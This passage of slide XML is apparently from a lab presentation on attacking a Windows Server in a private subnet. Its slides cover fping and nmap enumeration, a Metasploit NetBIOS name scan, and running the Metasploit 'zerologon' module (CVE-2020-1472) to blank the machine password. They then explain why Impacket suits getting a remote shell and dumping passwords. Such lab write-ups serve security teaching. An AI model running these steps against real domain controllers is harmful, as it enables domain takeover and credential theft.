        <p:nvSpPr>
          <p:cNvPr id="697" name="Google Shape;697;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3216000"/>
            <a:ext cx="8761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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>To test if we have connectivity to the subnet, we can use fping and pipe the output to grep the string “alive”, which indicates that the host is active on the network. 192.168.75.1 is the default gateway and 192.168.75.204 is the eth1 interface of the ubuntu machine so only 192.168.75.192 requires further investigation which we will be conducting next. fping allows us to quickly and easily scan a network (or subnet) for active machines and requires a shorter amount of time compared to other scanning tools like nmap.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="698" name="Google Shape;698;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="934375" y="1117200"/>
            <a:ext cx="4162425" cy="17811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79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3284350" y="3670025"/>
            <a:ext cx="5082600" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>06</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>. Exploiting ZeroLogon</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704" name="Google Shape;704;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237375" y="4181150"/>
            <a:ext cx="31296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400"/>
              <a:t>Part 2: Zerologon (CVE-2020-1472)</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="705" name="Google Shape;705;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10919" l="0" r="823" t="9259"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1432837" y="667425"/>
            <a:ext cx="6278325" cy="26433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80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Enumeration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="711" name="Google Shape;711;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442200" y="4207075"/>
            <a:ext cx="7941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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Since we encountered a new host, we can first use nmap to scan the services in the subnet  and on the specific machine we pinpointed, but unfortunately there is some issue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> the ports (may be a nmap software issue as mentioned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="712" name="Google Shape;712;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="868300" y="742725"/>
            <a:ext cx="5918476" cy="346434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81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Enumeration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718" name="Google Shape;718;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839250" y="3553100"/>
            <a:ext cx="794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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We can then use the NSE script for os host discovery to check the open ports. Since Zerologon uses ports 135 and 445 which are open, we can attempt to exploit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="719" name="Google Shape;719;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="901350" y="852850"/>
            <a:ext cx="7672672" cy="24487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82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Find Windows Server Device Name</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="725" name="Google Shape;725;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1217800" y="3553100"/>
            <a:ext cx="7562400" cy="151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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In Metasploit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>use auxiliary/scanner/netbios/nbname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>, and set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>as the IP address of the Windows Server.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>This is to retrieve the device name of the Windows Server, in order for us to proceed with the ZeroLogon exploit.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Copy the name of the Windows Server in the output after running the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>auxiliary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="726" name="Google Shape;726;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1101575" y="716526"/>
            <a:ext cx="7403401" cy="29316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83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152450" y="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Metasploit ZeroLogon</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="732" name="Google Shape;732;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="614562" y="513225"/>
            <a:ext cx="7596376" cy="38474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84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Metasploit ZeroLogon</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="738" name="Google Shape;738;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731300" y="3571350"/>
            <a:ext cx="7362900" cy="130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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In Metasploit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>use zerologon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>, and set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>as the IP address of windows server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>nbname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> as the name of the Windows Server machine, and run.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>You can enter check, to check if the target server is vulnerable.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>The output will show that the machine’s password is set to an empty string.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="739" name="Google Shape;739;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1482699"/>
            <a:ext cx="9144002" cy="1405527"/>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85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256625" y="391225"/>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Reasons for using Impacket Suite</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="745" name="Google Shape;745;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277550" y="1427400"/>
            <a:ext cx="795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Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="746" name="Google Shape;746;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="997813"/>
            <a:ext cx="8520600" cy="34119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1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>allows for low-level access to network protocols and supports SMBv1 and TCP/IP, which we will use for attacking the windows machine.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>free and open source</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>various utilities for different purposes (i.e. getting an interactive/semi-interactive shell) or dumping passwords etc.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>useful after ZeroLogon has been completed since the password is now fixed (16 bytes of zeroes) and we can use the utilities to attempt to get remote shell access to the Windows server.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
